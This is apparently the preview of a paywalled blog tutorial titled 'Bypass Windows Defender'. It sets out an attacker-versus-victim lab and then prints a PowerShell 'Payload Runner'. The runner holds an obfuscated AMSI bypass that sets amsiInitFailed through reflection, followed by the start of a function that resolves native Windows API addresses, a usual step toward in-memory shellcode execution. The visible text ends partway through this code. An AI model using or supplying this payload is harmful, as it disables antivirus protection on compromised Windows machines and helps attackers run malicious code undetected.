Member-only story
Bypass Windows Defender
6 min readJul 28, 2022
Press enter or click to view image in full size![]()
In this article, we will bypass Windows Defender (the latest version), explaining each step in detail.
Requirements
- Windows 10 machine (Victim)
- Low-level privilege account compromised on Victim
- Linux machine (Attacker)
- Defender Anti-Virus running & up-to-date at the moment of publishing this article
Payloads Used
- Payload Runner:
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)function LookupFunc {Param ($moduleName, $functionName)$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$tmp=@()$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))}
